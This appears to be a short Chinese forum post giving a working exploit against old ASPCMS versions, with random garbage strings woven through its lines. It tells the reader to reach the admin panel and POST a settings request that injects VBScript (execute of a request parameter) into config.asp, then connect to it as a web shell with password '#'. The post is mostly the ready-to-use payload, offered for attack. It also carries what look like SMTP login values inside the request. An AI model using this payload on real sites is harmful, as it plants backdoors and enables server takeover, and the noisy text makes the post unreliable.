老的ASPCMS版本的秒杀拿SHELL漏洞: U2 c4 |2 Z+ J! M1 v1 C
, `% a9 \; s) \5 Z) i! s
找到后台。。。然后: W, [) Z( {# S/ D, U/ z
0 t3 V' l5 J9 O5 Z5 N1 i
/admin/_system/AspCms_SiteSetting.asp?action=saves! |& l6 a; |) ^2 D
) k. _6 V, K* y; ]+ Q6 |
直接POST1 e( D5 b+ k! s, C) P5 P) m) o
8 C' z, }& }" p" \5 J) s( m$ [runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1 ]% f( D0 g# s* |4 i
6 I* l" P: G0 N4 m) p再连接配置文件config.asp 密码为#4 K6 B+ m/ G" \8 D; n( K
|